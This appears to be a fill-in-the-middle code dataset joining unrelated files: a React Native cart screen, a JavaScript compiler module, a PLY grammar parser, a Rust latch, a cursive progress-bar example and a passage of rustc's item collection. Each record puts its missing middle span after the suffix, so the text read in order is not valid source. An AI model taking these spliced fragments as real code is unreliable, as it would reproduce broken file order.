</ProductSinglePrice>
<TotalContainer>
<ProductQuantity>{`${item.quantity}x`}</ProductQuantity>
| {formatValue(item.price * item.quantity)}
</ProductPrice>
</TotalContainer>
</ProductPriceContainer>
</ProductTitleContainer>
<ActionContainer>
<ActionButton
testID={`increment-${item.id}`}
onPress={() => handleIncrement(item.id)}
>
<FeatherIcon name="plus" color="#E83F5B" size={16} />
</ActionButton>
<ActionButton
testID={`decrement-${item.id}`}
onPress={() => handleDecrement(item.id)}
>
<FeatherIcon name="minus" color="#E83F5B" size={16} />
</ActionButton>
</ActionContainer>
</Product>
)}
/>
</ProductContainer>
<TotalProductsContainer>
<FeatherIcon name="shopping-cart" color="#fff" size={24} />
<TotalProductsText>{`${totalItensInCart} itens`}</TotalProductsText>
<SubtotalValue>{cartTotal}</SubtotalValue>
</TotalProductsContainer>
</Container>
);
};
export default Cart; | <ProductPrice> |
compiler.js | var fs = require('fs');
var path = require('path');
var _ = require('underscore');
var fsext = require('../fsext');
var CompileProcess = require('./compile-process');
module.exports = Compiler;
/**
* `Compiler` is the class for compiling awfco (AWF Compiled Object).
*
* An instance of this class is responsible to compile (transpile) some type of
* source to valid es5 script code along with bundled css, module dependency and
* source map.
*
* This class should not be subclassed. Pass in a `compileFunc` when instantiating
* instead.
*
* `compileFunc` is an function implementing specific compile process. It will be
* called as an object method, the object will contain the following property and
* methods which may be accessed through this:
*
* opt: compiler input options with the following keys:
* moduleName : default import/export name for the module
* importPath : path of the module used for importing
* relativePath : path of the source file relative to project root
* absolutePath : system normalized absolute file path of the source file
* sourceContent : the text content of the source code
* extra : extra options that may be passed to the compiler
*
* success(): called on a successful compile, marks the end of compilation.
* Tip: set result on jsOutput, jsMap, cssOutput, cssMap defined on `this`
*
* reject(): called on failure (e.g. syntax error), marks the end of compilation.
* reject(message:string, line:number, column:number)
* reject(message:string, pos:Object<{path, content, line, column}>)
* reject(errors:Array)
*
* depends(): called if this compiled module logically depends on another compiled
* module and that depended module should precede in the linking process.
* depends(moduleName:string)
*
* watch(): called if this compiled object should be recompiled when a source file
* other than the directly pointed one is changed.
* watch(sourceAbsolutePath:string)
*
* Tip: The `compileFunc` function call context object can be extended by extending
* the prototype property of the function.
*
* Hint: all line and column numbers are zero based
**/
function Compiler(compileFunc) {
if (typeof this != 'object' || !(this instanceof Compiler)) {
return new Compiler(compileFunc);
}
this.CompileProcess = CompileProcess.derive(compileFunc);
}
/**
* Compile `fpath` to `target`, with `dir` as project root
* Return a promise
*/
Compiler.prototype.compile = function(fpath, target, dir, extra) {
return new Promise(proc.bind(this));
function proc(accept, reject) {
if (typeof dir == 'object') {
extra = dir;
dir = '.';
} else if (!dir) {
dir = '.';
}
fs.readFile(fpath, 'utf-8', gotFile.bind(this));
function gotFile(err, content) {
if (err) {
accept();
} else {
var opt = {};
opt.relativePath = fsext.normalizePath(path.relative(dir, fpath));
opt.absolutePath = fsext.normalizePath(path.resolve(fpath));
opt.target = fsext.normalizePath(path.resolve(target));
opt.moduleName = Compiler.moduleName(opt.relativePath);
opt.importPath = '/' + Compiler.importPath(opt.relativePath);
opt.extra = extra || {};
opt.sourceContent = content;
var compileProcess = new (this.CompileProcess)(); | console.warn(err.stack);
});
}
}
};
};
Compiler.moduleName = function(fpath) {
var path = require('path');
var name = path.basename(fpath);
name = name.split('.')[0] || '';
name = name.replace(/[^$a-zA-Z0-9_$]+/g, '_');
if (name.match(/^[0-9]/))
name = '_' + name;
return name;
};
Compiler.importPath = function(fpath, contextPath) {
var ret = fpath;
var isRelative = !!ret.match(/^\.\.?[\/\\]/);
var name = Compiler.moduleName(ret);
ret = path.dirname(ret);
if (name != 'index') {
ret = path.join(ret, name);
}
if (contextPath && isRelative) {
ret = path.join(path.dirname(contextPath), ret);
}
if (isRelative || fpath[0] == '/' || fpath[0] == '\\')
ret = '/' + ret;
return fsext.normalizePath(ret);
}; | compileProcess
.compile(opt)
.then(accept)
.catch(function(err) { |
parse.py | import ply.yacc as yacc
# get the token map from the lexer
from lex import tokens
import sys
import pushdown
Pushdown = pushdown.Pushdown
State = pushdown.State
Rule = pushdown.Rule
ParseState = pushdown.ParseState
Production = pushdown.Production
Shift = pushdown.Shift
Reduce = pushdown.Reduce
# Grammar
#
# file := GRAMMAR NEWLINE rulelist NEWLINE TLIST NEWLINE tlist NEWLINE
# NTLIST NEWLINE ntlist NEWLINE PMETHOD NEWLINE statelist
# rulelist := rule rulelist
# | empty
# tlist := tterm tlist
# | empty
# ntlist := ntterm ntlist
# | empty
# statelist := state statelist
# | empty
# rule := RULE production
# tterm := TERMINAL COLON numbers
# ntterm := NONTERMINAL COLON numbers
# state := STATE NEWLINE srulelist NEWLINE trules NEWLINE ntrules NEWLINE
# production := NONTERMINAL RARROW rhs
# numbers := INT numbers
# | empty
# srulelist := srule
# | empty
# trules := trule trules
# | empty
# ntrules := ntrule ntrules
# | empty
# rhs := exp erhs
# erhs := exp erhs
# | empty
# srule := LPAREN INT RPAREN production
# trule := TERMINAL operation
# ntrule := NONTERMINAL operation
# exp := DOT | TERMINAL | NONTERMINAL
# operation := SHIFT | REDUCE LPAREN production RPAREN
terminals = ["<empty>"]
non_terminals = []
def p_file(p):
'''file : anythinglist GRAMMAR DNEWLINE rulelist TLIST DNEWLINE tlist NTLIST DNEWLINE ntlist PMETHOD DNEWLINE statelist'''
terms = [x for (x, _) in p[7]]
nterms = [x for (x, _) in p[10]]
print "non_terminals:", non_terminals
print "terminals:", terminals
p[0] = Pushdown(p[13], terms, nterms)
for r in p[4]:
p[0].add_rule(r)
for s in p[13]:
p[0].add_state(s)
for k, v in p[7]:
p[0].add_t(k, v)
for k, v in p[10]:
p[0].add_nt(k, v)
# ignore everything before we see the start of the GRAMMAR
def p_anything(p):
''' anything : RULE
| STATE
| TLIST
| NTLIST
| PMETHOD
| SHIFT
| REDUCE
| RARROW
| IDENT
| INT
| COLON
| LPAREN
| RPAREN
| DOT
| NEWLINE
| DNEWLINE'''
pass
# We'll simplify things by having a single rule for all our list productions
def p_list(p):
'''statelist : state statelist
| state NEWLINE statelist
| empty
numbers : INT numbers
| empty
trules : trule NEWLINE trules
| DNEWLINE
ntrules : ntrule NEWLINE ntrules
| empty
erhs : exp erhs
| empty
anythinglist : anything anythinglist
| empty'''
if len(p) == 2:
p[0] = list()
elif len(p) == 4:
p[0] = [p[1]] + p[3]
else:
p[0] = [p[1]] + p[2]
def p_non_empty_list(p):
'''tlist : tterm NEWLINE tlist
| tterm DNEWLINE
ntlist : ntterm NEWLINE ntlist
| ntterm DNEWLINE
srulelist : srule NEWLINE srulelist
| srule DNEWLINE
sactions : action NEWLINE sactions
| action DNEWLINE'''
if len(p) == 3:
p[0] = [p[1]]
else:
p[0] = [p[1]] + p[3]
# def p_rulelist(p):
# '''rulelist : ruleset DNEWLINE rulelist
# | empty'''
# if len(p) == 2:
# p[0] = list()
# else:
# p[0] = p[1] + p[3]
# def p_forced_list(p):
# '''trules : trule etrules
# ntrules : ntrule entrules'''
# p[0] = [p[1]] + p[2]
def p_ruleset(p):
'''rulelist : rule NEWLINE rulelist
| rule DNEWLINE'''
if len(p) == 3:
p[0] = [p[1]]
else:
p[0] = [p[1]] + p[3]
def p_rule(p):
'''rule : RULE production'''
p[0] = Rule(p[1], p[2]._lhs, p[2]._rhs)
def p_tterm(p):
'''tterm : IDENT COLON numbers'''
global terminals
terminals.append(p[1])
p[0] = (p[1], p[3])
def p_ntterm(p):
'''ntterm : IDENT COLON numbers'''
global non_terminals
non_terminals.append(p[1])
p[0] = (p[1], p[3])
def p_state(p):
'''state : STATE DNEWLINE srulelist sactions sactions
| STATE DNEWLINE srulelist sactions
| STATE DNEWLINE srulelist DNEWLINE'''
actions = []
if isinstance(p[4], list):
actions.extend([(x, y) for (x, y) in p[4] if y is not None])
if len(p) >= 6:
actions.extend([(x, y) for (x, y) in p[5] if y is not None])
# make a dict of t- and nt-transitions
t = dict()
nt = dict() | for k, v in actions:
if k in non_terminals:
nt[k] = v
else:
t[k] = v
p[0] = State(p[1], p[3], t, nt)
# def p_state_no_t(p):
# '''state : STATE dnewline srulelist dnewline ntrules NEWLINE'''
# # make a dict of t- and nt-transitions
# t = dict()
# nt = dict()
# for k, v in p[6]:
# nt[k] = v
# p[0] = State(p[1], p[2], t, nt)
#
#
# def p_state_no_nt(p):
# '''state : STATE dnewline srulelist NEWLINE trules NEWLINE'''
# # make a dict of t- and nt-transitions
# t = dict()
# nt = dict()
# for k, v in p[5]:
# t[k] = v
# p[0] = State(p[1], p[2], t, nt)
def p_production(p):
'''production : IDENT RARROW rhs'''
p[0] = Production(p[1], p[3])
def p_rhs(p):
'''rhs : exp erhs'''
p[0] = [p[1]] + p[2]
def p_srule(p):
'''srule : LPAREN INT RPAREN production'''
p[0] = ParseState(p[2], p[4]._rhs.index('.'))
def p_action(p):
'''trule : IDENT operation
ntrule : IDENT operation
action : IDENT operation
| BANG IDENT LBRACKET operation RBRACKET'''
if len(p) == 6:
p[0] = (p[2], None)
else:
p[0] = (p[1], p[2])
def p_exp(p):
'''exp : DOT
| IDENT'''
p[0] = p[1]
def p_operation(p):
'''operation : SHIFT
| REDUCE LPAREN production RPAREN'''
if len(p) == 2:
p[0] = Shift(p[1])
else:
p[0] = Reduce(ParseState(p[1], position=p[3]._rhs.index('.')))
# Error rule for syntax errors
def p_error(p):
if not p:
print "End of File!"
return
print "Syntax error at token", p.type, "on line", p.lineno
sys.exit(1)
def p_empty(p):
'''empty : '''
pass
parser = yacc.yacc() | |
latch.rs | // Unless explicitly stated otherwise all files in this repository are licensed
// under the MIT/Apache-2.0 License, at your convenience
//
// This product includes software developed at Datadog (https://www.datadoghq.com/).
// Copyright 2020 Datadog, Inc.
//
//! Similar to a [`std::sync::Barrier`] but provides [`Latch::cancel`] which a
//! failed thread can use to cancel the `Latch`.
//! [`Latch::wait`] and [`Latch::arrive_and_wait`] return a [`LatchState`] to
//! determine whether the state is `Ready` or `Canceled`.
//!
//! The implementation is intended for multi-threaded rather than task local
//! use.
use std::sync::{
atomic::{AtomicUsize, Ordering},
Arc,
Condvar,
Mutex,
};
#[derive(Clone, Debug)]
pub(crate) struct Latch {
inner: Arc<LatchInner>,
}
#[derive(Debug)]
struct LatchInner {
count: AtomicUsize,
state: Mutex<LatchState>,
cv: Condvar,
}
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum LatchState {
Pending,
Ready,
Canceled,
}
impl Latch {
/// Create a new `Latch` with given count.
pub fn new(count: usize) -> Self {
let state = if 0 < count {
LatchState::Pending
} else {
LatchState::Ready
};
let inner = LatchInner {
count: AtomicUsize::new(count),
state: Mutex::new(state),
cv: Condvar::new(),
};
Self {
inner: Arc::new(inner),
}
}
/// If the counter's current value is greater than or equal to `n`, this
/// method decrements the counter by 'n' and returns an `Ok` containing
/// the previous value. Otherwise, this method returns an `Err` with
/// the previous value. This method's behavior is independent of the
/// `LatchState` (e.g. it may return `Ok(0)` even if the state is `Canceled`
/// if `n == 0`).
///
/// The method does not synchronize with other threads, so while setting the
/// counter to 0 with this method (or checking its value with
/// `count_down(0)`) is indicative that the state is either `Ready` or
/// `Canceled`, other data may not yet be synchronized with other threads.
pub fn count_down(&self, n: usize) -> Result<usize, usize> {
self.update(LatchState::Ready, |v| (v >= n).then(|| v - n))
}
/// Cancels the latch. Other threads will no longer wait. If this call
/// caused a Cancellation, it returns `Ok` with the previous counter value.
/// Otherwise, it returns an `Err` with the `LatchState`.
///
/// The method does not synchronize with other threads.
pub fn | (&self) -> Result<usize, LatchState> {
self.update(LatchState::Canceled, |v| (v != 0).then(|| 0))
.map_err(|_| self.wait())
}
/// Wait for `Ready` or `Canceled`. Synchronizes with other threads via an
/// internal `Mutex`.
#[must_use = "check if latch was canceled"]
pub fn wait(&self) -> LatchState {
*self
.inner
.cv
.wait_while(self.lock(), |s| matches!(s, LatchState::Pending))
.expect("unreachable: poisoned mutex")
}
/// Decrement the counter by one and wait for `Ready` or `Canceled`.
/// Synchronizes with other threads via an internal `Mutex`.
#[must_use = "check if latch was canceled"]
pub fn arrive_and_wait(&self) -> LatchState {
self.count_down(1).ok();
self.wait()
}
/// Update the counter based on the provided closure `f` which receives as
/// input the current value of the counter and should return `Some(new)`
/// or `None` if no change should be made. The provided closure is
/// called repeatedly until it either succeeds in updating the `Latch`'s
/// internal atomic counter or returns `None`. If the updated counter value
/// is `0`, then `LatchState` will be changed to `state_if_zero`. The
/// `update` method returns an `Ok` of the previous counter value if the
/// closure returned `Some(new)` or an `Err` of the unchanged value
/// otherwise.
fn update<F>(&self, state_if_zero: LatchState, mut f: F) -> Result<usize, usize>
where
F: FnMut(usize) -> Option<usize>,
{
let mut new = None;
let f_observe = |cur| {
new = f(cur);
new
};
// the Mutex synchronizes, so using `Ordering::Relaxed` here
let res = self
.inner
.count
.fetch_update(Ordering::Relaxed, Ordering::Relaxed, f_observe);
if let Some(0) = new {
self.set_state(state_if_zero);
}
res
}
fn set_state(&self, state: LatchState) {
*self.lock() = state;
self.inner.cv.notify_all();
}
fn lock(&self) -> std::sync::MutexGuard<'_, LatchState> {
self.inner
.state
.lock()
.expect("unreachable: poisoned mutex")
}
}
#[cfg(test)]
mod test {
use super::*;
use std::collections::HashSet;
#[test]
fn cancel() {
let n = 1 << 10;
let cxl_ids = (n / 2..n + 1)
.into_iter()
.step_by(n / 2 / 5)
.collect::<HashSet<_>>();
assert_eq!(6, cxl_ids.len());
let (w, a, t) = helper(cxl_ids, n);
assert_eq!(n - 5 - 1, w.len());
assert_eq!(1, a.len());
assert_eq!(5, t.len());
w.into_iter().for_each(|s| {
assert_eq!(s, LatchState::Canceled);
});
}
#[test]
fn ready() {
let n = 1 << 10;
let cxl_ids = HashSet::new();
assert_eq!(0, cxl_ids.len());
let (w, a, t) = helper(cxl_ids, n);
assert_eq!(n, w.len());
assert_eq!(0, a.len());
assert_eq!(0, t.len());
w.into_iter().for_each(|s| {
assert_eq!(s, LatchState::Ready);
});
}
fn helper(
cxl_ids: HashSet<usize>,
count: usize,
) -> (Vec<LatchState>, Vec<usize>, Vec<LatchState>) {
let latch = Latch::new(count);
let cxl_ids = Arc::new(cxl_ids);
let res = (0..count)
.into_iter()
.map(|id| {
std::thread::spawn({
let l = Latch::clone(&latch);
let cxl_ids = Arc::clone(&cxl_ids);
move || {
if !cxl_ids.contains(&id) {
Ok(l.arrive_and_wait())
} else {
Err(l.cancel())
}
}
})
})
.collect::<Vec<_>>()
.into_iter()
.map(|h| h.join().unwrap());
let mut waits = Vec::new();
let mut cxls = Vec::new();
let mut cxl_attempts = Vec::new();
for r in res {
match r {
Ok(w) => waits.push(w),
Err(Ok(id)) => cxls.push(id),
Err(Err(s)) => cxl_attempts.push(s),
}
}
(waits, cxls, cxl_attempts)
}
}
| cancel |
progress.rs | use cursive::traits::*;
use cursive::utils::Counter;
use cursive::views::{Button, Dialog, LinearLayout, ProgressBar, TextView};
use cursive::Cursive;
use rand::Rng;
use std::cmp::min;
use std::thread;
use std::time::Duration;
// This example shows a ProgressBar reporting the status from an asynchronous
// job.
//
// It works by sharing a counter with the job thread. This counter can be
// "ticked" to indicate progress.
fn main() |
fn phase_1(s: &mut Cursive) {
// Phase 1 is easy: a simple pre-loading.
// Number of ticks
let n_max = 1000;
// This is the callback channel
let cb = s.cb_sink().clone();
s.pop_layer();
s.add_layer(Dialog::around(
ProgressBar::new()
// We need to know how many ticks represent a full bar.
.range(0, n_max)
.with_task(move |counter| {
// This closure will be called in a separate thread.
fake_load(n_max, &counter);
// When we're done, send a callback through the channel
cb.send(Box::new(coffee_break)).unwrap();
})
.full_width(),
));
s.set_autorefresh(true);
}
fn coffee_break(s: &mut Cursive) {
// A little break before things get serious.
s.set_autorefresh(false);
s.pop_layer();
s.add_layer(
Dialog::new()
.title("Preparation complete")
.content(TextView::new("Now, the real deal!").center())
.button("Again??", phase_2),
);
}
fn phase_2(s: &mut Cursive) {
// Now, we'll run N tasks
// (It could be downloading a file, extracting an archive,
// reticulating sprites, ...)
let n_bars = 10;
// Each task will have its own shiny counter
let counters: Vec<_> = (0..n_bars).map(|_| Counter::new(0)).collect();
// To make things more interesting, we'll give a random speed to each bar
let speeds: Vec<_> = (0..n_bars)
.map(|_| rand::thread_rng().gen_range(50, 150))
.collect();
let n_max = 100_000;
let cb = s.cb_sink().clone();
// Let's prepare the progress bars...
let mut linear = LinearLayout::vertical();
for c in &counters {
linear.add_child(ProgressBar::new().max(n_max).with_value(c.clone()));
}
s.pop_layer();
s.add_layer(Dialog::around(linear.full_width()).title("Just a moment..."));
// And we start the worker thread.
thread::spawn(move || {
loop {
thread::sleep(Duration::from_millis(5));
let mut done = true;
for (c, s) in counters.iter().zip(&speeds) {
let ticks = min(n_max - c.get(), *s);
c.tick(ticks);
if c.get() < n_max {
done = false;
}
}
if done {
break;
}
}
cb.send(Box::new(final_step)).unwrap();
});
s.set_autorefresh(true);
}
fn final_step(s: &mut Cursive) {
// A little break before things get serious.
s.set_autorefresh(false);
s.pop_layer();
s.add_layer(
Dialog::new()
.title("Report")
.content(
TextView::new(
"Time travel was a success!\n\
We went forward a few seconds!!",
)
.center(),
)
.button("That's it?", |s| s.quit()),
);
}
// Function to simulate a long process.
fn fake_load(n_max: usize, counter: &Counter) {
for _ in 0..n_max {
thread::sleep(Duration::from_millis(5));
// The `counter.tick()` method increases the progress value
counter.tick(1);
}
}
| {
let mut siv = Cursive::default();
// We'll start slowly with a simple start button...
siv.add_layer(
Dialog::new()
.title("Progress bar example")
.padding_lrtb(0, 0, 1, 1)
.content(Button::new("Start", phase_1)),
);
siv.run();
} |
collect.rs | // Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! "Collection" is the process of determining the type and other external
//! details of each item in Rust. Collection is specifically concerned
//! with *interprocedural* things -- for example, for a function
//! definition, collection will figure out the type and signature of the
//! function, but it will not visit the *body* of the function in any way,
//! nor examine type annotations on local variables (that's the job of
//! type *checking*).
//!
//! Collecting is ultimately defined by a bundle of queries that
//! inquire after various facts about the items in the crate (e.g.,
//! `type_of`, `generics_of`, `predicates_of`, etc). See the `provide` function
//! for the full set.
//!
//! At present, however, we do run collection across all items in the
//! crate as a kind of pass. This should eventually be factored away.
use astconv::{AstConv, Bounds};
use constrained_type_params as ctp;
use lint;
use middle::lang_items::SizedTraitLangItem;
use middle::resolve_lifetime as rl;
use middle::weak_lang_items;
use rustc::mir::mono::Linkage;
use rustc::ty::query::Providers;
use rustc::ty::subst::Substs;
use rustc::ty::util::Discr;
use rustc::ty::util::IntTypeExt;
use rustc::ty::{self, AdtKind, ToPolyTraitRef, Ty, TyCtxt};
use rustc::ty::{ReprOptions, ToPredicate};
use rustc::util::captures::Captures;
use rustc::util::nodemap::FxHashMap;
use rustc_target::spec::abi;
use syntax::ast;
use syntax::ast::MetaItemKind;
use syntax::attr::{InlineAttr, list_contains_name, mark_used};
use syntax::source_map::Spanned;
use syntax::feature_gate;
use syntax::symbol::{keywords, Symbol};
use syntax_pos::{Span, DUMMY_SP};
use rustc::hir::def::{CtorKind, Def};
use rustc::hir::Node;
use rustc::hir::def_id::{DefId, LOCAL_CRATE};
use rustc::hir::intravisit::{self, NestedVisitorMap, Visitor};
use rustc::hir::GenericParamKind;
use rustc::hir::{self, CodegenFnAttrFlags, CodegenFnAttrs, Unsafety};
///////////////////////////////////////////////////////////////////////////
// Main entry point
pub fn collect_item_types<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>) {
let mut visitor = CollectItemTypesVisitor { tcx: tcx };
tcx.hir
.krate()
.visit_all_item_likes(&mut visitor.as_deep_visitor());
}
pub fn provide(providers: &mut Providers) {
*providers = Providers {
type_of,
generics_of,
predicates_of,
predicates_defined_on,
explicit_predicates_of,
super_predicates_of,
type_param_predicates,
trait_def,
adt_def,
fn_sig,
impl_trait_ref,
impl_polarity,
is_foreign_item,
codegen_fn_attrs,
..*providers
};
}
///////////////////////////////////////////////////////////////////////////
/// Context specific to some particular item. This is what implements
/// AstConv. It has information about the predicates that are defined
/// on the trait. Unfortunately, this predicate information is
/// available in various different forms at various points in the
/// process. So we can't just store a pointer to e.g. the AST or the
/// parsed ty form, we have to be more flexible. To this end, the
/// `ItemCtxt` is parameterized by a `DefId` that it uses to satisfy
/// `get_type_parameter_bounds` requests, drawing the information from
/// the AST (`hir::Generics`), recursively.
pub struct ItemCtxt<'a, 'tcx: 'a> {
tcx: TyCtxt<'a, 'tcx, 'tcx>,
item_def_id: DefId,
}
///////////////////////////////////////////////////////////////////////////
struct CollectItemTypesVisitor<'a, 'tcx: 'a> {
tcx: TyCtxt<'a, 'tcx, 'tcx>,
}
impl<'a, 'tcx> Visitor<'tcx> for CollectItemTypesVisitor<'a, 'tcx> {
fn nested_visit_map<'this>(&'this mut self) -> NestedVisitorMap<'this, 'tcx> |
fn visit_item(&mut self, item: &'tcx hir::Item) {
convert_item(self.tcx, item.id);
intravisit::walk_item(self, item);
}
fn visit_generics(&mut self, generics: &'tcx hir::Generics) {
for param in &generics.params {
match param.kind {
hir::GenericParamKind::Lifetime { .. } => {}
hir::GenericParamKind::Type {
default: Some(_), ..
} => {
let def_id = self.tcx.hir.local_def_id(param.id);
self.tcx.type_of(def_id);
}
hir::GenericParamKind::Type { .. } => {}
}
}
intravisit::walk_generics(self, generics);
}
fn visit_expr(&mut self, expr: &'tcx hir::Expr) {
if let hir::ExprKind::Closure(..) = expr.node {
let def_id = self.tcx.hir.local_def_id(expr.id);
self.tcx.generics_of(def_id);
self.tcx.type_of(def_id);
}
intravisit::walk_expr(self, expr);
}
fn visit_trait_item(&mut self, trait_item: &'tcx hir::TraitItem) {
convert_trait_item(self.tcx, trait_item.id);
intravisit::walk_trait_item(self, trait_item);
}
fn visit_impl_item(&mut self, impl_item: &'tcx hir::ImplItem) {
convert_impl_item(self.tcx, impl_item.id);
intravisit::walk_impl_item(self, impl_item);
}
}
///////////////////////////////////////////////////////////////////////////
// Utility types and common code for the above passes.
impl<'a, 'tcx> ItemCtxt<'a, 'tcx> {
pub fn new(tcx: TyCtxt<'a, 'tcx, 'tcx>, item_def_id: DefId) -> ItemCtxt<'a, 'tcx> {
ItemCtxt { tcx, item_def_id }
}
}
impl<'a, 'tcx> ItemCtxt<'a, 'tcx> {
pub fn to_ty(&self, ast_ty: &hir::Ty) -> Ty<'tcx> {
AstConv::ast_ty_to_ty(self, ast_ty)
}
}
impl<'a, 'tcx> AstConv<'tcx, 'tcx> for ItemCtxt<'a, 'tcx> {
fn tcx<'b>(&'b self) -> TyCtxt<'b, 'tcx, 'tcx> {
self.tcx
}
fn get_type_parameter_bounds(&self, span: Span, def_id: DefId) -> ty::GenericPredicates<'tcx> {
self.tcx
.at(span)
.type_param_predicates((self.item_def_id, def_id))
}
fn re_infer(
&self,
_span: Span,
_def: Option<&ty::GenericParamDef>,
) -> Option<ty::Region<'tcx>> {
None
}
fn ty_infer(&self, span: Span) -> Ty<'tcx> {
struct_span_err!(
self.tcx().sess,
span,
E0121,
"the type placeholder `_` is not allowed within types on item signatures"
).span_label(span, "not allowed in type signatures")
.emit();
self.tcx().types.err
}
fn projected_ty_from_poly_trait_ref(
&self,
span: Span,
item_def_id: DefId,
poly_trait_ref: ty::PolyTraitRef<'tcx>,
) -> Ty<'tcx> {
if let Some(trait_ref) = poly_trait_ref.no_late_bound_regions() {
self.tcx().mk_projection(item_def_id, trait_ref.substs)
} else {
// no late-bound regions, we can just ignore the binder
span_err!(
self.tcx().sess,
span,
E0212,
"cannot extract an associated type from a higher-ranked trait bound \
in this context"
);
self.tcx().types.err
}
}
fn normalize_ty(&self, _span: Span, ty: Ty<'tcx>) -> Ty<'tcx> {
// types in item signatures are not normalized, to avoid undue
// dependencies.
ty
}
fn set_tainted_by_errors(&self) {
// no obvious place to track this, just let it go
}
fn record_ty(&self, _hir_id: hir::HirId, _ty: Ty<'tcx>, _span: Span) {
// no place to record types from signatures?
}
}
fn type_param_predicates<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
(item_def_id, def_id): (DefId, DefId),
) -> ty::GenericPredicates<'tcx> {
use rustc::hir::*;
// In the AST, bounds can derive from two places. Either
// written inline like `<T:Foo>` or in a where clause like
// `where T:Foo`.
let param_id = tcx.hir.as_local_node_id(def_id).unwrap();
let param_owner = tcx.hir.ty_param_owner(param_id);
let param_owner_def_id = tcx.hir.local_def_id(param_owner);
let generics = tcx.generics_of(param_owner_def_id);
let index = generics.param_def_id_to_index[&def_id];
let ty = tcx.mk_ty_param(index, tcx.hir.ty_param_name(param_id).as_interned_str());
// Don't look for bounds where the type parameter isn't in scope.
let parent = if item_def_id == param_owner_def_id {
None
} else {
tcx.generics_of(item_def_id).parent
};
let mut result = parent.map_or(
ty::GenericPredicates {
parent: None,
predicates: vec![],
},
|parent| {
let icx = ItemCtxt::new(tcx, parent);
icx.get_type_parameter_bounds(DUMMY_SP, def_id)
},
);
let item_node_id = tcx.hir.as_local_node_id(item_def_id).unwrap();
let ast_generics = match tcx.hir.get(item_node_id) {
Node::TraitItem(item) => &item.generics,
Node::ImplItem(item) => &item.generics,
Node::Item(item) => {
match item.node {
ItemKind::Fn(.., ref generics, _)
| ItemKind::Impl(_, _, _, ref generics, ..)
| ItemKind::Ty(_, ref generics)
| ItemKind::Existential(ExistTy {
ref generics,
impl_trait_fn: None,
..
})
| ItemKind::Enum(_, ref generics)
| ItemKind::Struct(_, ref generics)
| ItemKind::Union(_, ref generics) => generics,
ItemKind::Trait(_, _, ref generics, ..) => {
// Implied `Self: Trait` and supertrait bounds.
if param_id == item_node_id {
result
.predicates
.push(ty::TraitRef::identity(tcx, item_def_id).to_predicate());
}
generics
}
_ => return result,
}
}
Node::ForeignItem(item) => match item.node {
ForeignItemKind::Fn(_, _, ref generics) => generics,
_ => return result,
},
_ => return result,
};
let icx = ItemCtxt::new(tcx, item_def_id);
result
.predicates
.extend(icx.type_parameter_bounds_in_generics(ast_generics, param_id, ty));
result
}
impl<'a, 'tcx> ItemCtxt<'a, 'tcx> {
/// Find bounds from hir::Generics. This requires scanning through the
/// AST. We do this to avoid having to convert *all* the bounds, which
/// would create artificial cycles. Instead we can only convert the
/// bounds for a type parameter `X` if `X::Foo` is used.
fn type_parameter_bounds_in_generics(
&self,
ast_generics: &hir::Generics,
param_id: ast::NodeId,
ty: Ty<'tcx>,
) -> Vec<ty::Predicate<'tcx>> {
let from_ty_params = ast_generics
.params
.iter()
.filter_map(|param| match param.kind {
GenericParamKind::Type { .. } if param.id == param_id => Some(¶m.bounds),
_ => None,
})
.flat_map(|bounds| bounds.iter())
.flat_map(|b| predicates_from_bound(self, ty, b));
let from_where_clauses = ast_generics
.where_clause
.predicates
.iter()
.filter_map(|wp| match *wp {
hir::WherePredicate::BoundPredicate(ref bp) => Some(bp),
_ => None,
})
.filter(|bp| is_param(self.tcx, &bp.bounded_ty, param_id))
.flat_map(|bp| bp.bounds.iter())
.flat_map(|b| predicates_from_bound(self, ty, b));
from_ty_params.chain(from_where_clauses).collect()
}
}
/// Tests whether this is the AST for a reference to the type
/// parameter with id `param_id`. We use this so as to avoid running
/// `ast_ty_to_ty`, because we want to avoid triggering an all-out
/// conversion of the type to avoid inducing unnecessary cycles.
fn is_param<'a, 'tcx>(
tcx: TyCtxt<'a, 'tcx, 'tcx>,
ast_ty: &hir::Ty,
param_id: ast::NodeId,
) -> bool {
if let hir::TyKind::Path(hir::QPath::Resolved(None, ref path)) = ast_ty.node {
match path.def {
Def::SelfTy(Some(def_id), None) | Def::TyParam(def_id) => {
def_id == tcx.hir.local_def_id(param_id)
}
_ => false,
}
} else {
false
}
}
fn convert_item<'a, 'tcx>(tcx: TyCtxt<'a, 'tcx, 'tcx>, item_id: ast::NodeId) {
let it = tcx.hir.expect_item(item_id);
debug!("convert: item {} with id {}", it.name, it.id);
let def_id = tcx.hir.local_def_id(item_id);
match it.node {
// These don't define types.
hir::ItemKind::ExternCrate(_)
| hir::ItemKind::Use(..)
| hir::ItemKind::Mod(_)
| hir::ItemKind::GlobalAsm(_) => {}
hir::ItemKind::ForeignMod(ref foreign_mod) => {
for item in &foreign_mod.items {
let def_id = tcx.hir.local_def_id(item.id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
if let hir::ForeignItemKind::Fn(..) = item.node {
tcx.fn_sig(def_id);
}
}
}
hir::ItemKind::Enum(ref enum_definition, _) => {
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
convert_enum_variant_types(tcx, def_id, &enum_definition.variants);
}
hir::ItemKind::Impl(..) => {
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.impl_trait_ref(def_id);
tcx.predicates_of(def_id);
}
hir::ItemKind::Trait(..) => {
tcx.generics_of(def_id);
tcx.trait_def(def_id);
tcx.at(it.span).super_predicates_of(def_id);
tcx.predicates_of(def_id);
}
hir::ItemKind::TraitAlias(..) => {
span_err!(
tcx.sess,
it.span,
E0645,
"trait aliases are not yet implemented (see issue #41517)"
);
}
hir::ItemKind::Struct(ref struct_def, _) | hir::ItemKind::Union(ref struct_def, _) => {
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
for f in struct_def.fields() {
let def_id = tcx.hir.local_def_id(f.id);
tcx.generics_of(def_id);
tcx.type_of(def_id);
tcx.predicates_of(def_id);
}
if !struct_def.is_struct() {
